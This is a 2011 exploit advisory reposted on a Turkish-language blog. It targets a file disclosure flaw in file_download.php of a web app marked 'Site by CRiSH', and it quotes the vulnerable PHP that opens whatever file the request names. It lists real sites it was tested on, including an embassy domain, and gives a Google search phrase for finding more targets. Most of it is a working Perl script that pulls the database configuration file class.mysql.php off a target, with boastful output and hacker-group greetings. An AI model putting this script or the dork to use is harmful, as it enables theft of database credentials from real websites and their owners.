~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
[~] Live Contact : knockoutr@msn.com |
[~] E-Mail : knockout@e-mail.com.tr |
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME / HTTP://GRIADAMLAR.COM |
-------------------------------------------------------- |
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
|~Web App. : Site by CRiSH |
|~Price : N/A |
|~Version : N/A |
|~Software: http://www.iware.com.tw/ |
|~Vulnerability Style : Ynformation disclosure |
|~Vulnerability Dir : / |
|~Google Keyword : "Site by CRiSH" |
|[~]Date : "10.05.2011" |
|[~]Tested on : |
http://trendxmarketing.com/ |
www.kuwaitembassy.net |
http://dxnmagnumlanka.com/ |
http://sambuddhatvajayanthi.com// |
---------------------------------------------------------- |
file_download.php <= 'file' Functions Not Security |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA |
Vulnerable ON file_download.php Lines.. |
<? |
.. |
@$download_file = $_REQUEST['file']; |
$download = @fopen("".$_REQUEST['file'],"r"); |
if(!$download) die('error in openinig file'); |
$file = basename($_REQUEST['file']); |
.. |
?> |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA |
--------------------------------------------------------- |
Manual Exploitation| |
http://Target/file_download.php?file={ Disclosure File } |
Ex: |
http://trendxmarketing.com/file_down...lass.mysql.php |
Exploit Scsfly! |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Automatic Information Disclosure Exploit. |
=============== KO.PL ================================================= |
use LWP::Simple; |
use LWP::UserAgent; |
system('cls'); |
system('title Site by CRiSH <= Remote class.mysql.php Disclosure Exploit'); |
system('color 2'); |
if(@ARGV < 2) |
{ |
print "[-]Su Sekilde Kocum. \n\n"; |
&help; exit(); |
} |
sub help() |
{ |
print "[+] usage1 : perl $0 HedefWeb /path/ \n"; |
print "[+] usage2 : perl $0 localhost / \n"; |
} |
print "\n*********************************************** *************************\n"; |
print "\* Plinka Design <= Remote (File Disclosure/LFI) Exploit *\n"; |
print "\* Exploited By : KnocKout *\n"; |
print "\* Contact : knockoutr[at]msn[dot]com *\n"; |
print "\* -- *\n"; |
print "\************************************************ *********************\n\n\n"; |
($TargetIP, $path, $File,) = @ARGV; |
$File="file_download.php?file=lib/class.mysql.php"; |
my $url = "http://" . $TargetIP . $path . $File; |
print "\n Az Bekle Sikertiyorum!!! \n\n"; |
my $useragent = LWP::UserAgent->new(); |
my $request = $useragent->get($url,":content_file" => "index.php"); |
if ($request->is_success) |
{ |
print "[+] $url <= Hedef Site Exploit Edildi!\n\n"; |
print "[+] OPERASYON TAMAM !\n"; |
print "[+] Index.php Dosyasi Indirildi (class.mysql.php)\n"; |
print "[+] GRAYHATZ STAR \n"; |
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) |
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz |
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... |
\n"; |
exit(); |
} |
else |
{ |
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n"; |
exit(); |
} |
10 Mayıs 2011 Salı
Site by CRiSH <= Remote 'class.mysql.php' Disclosure Exploit
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder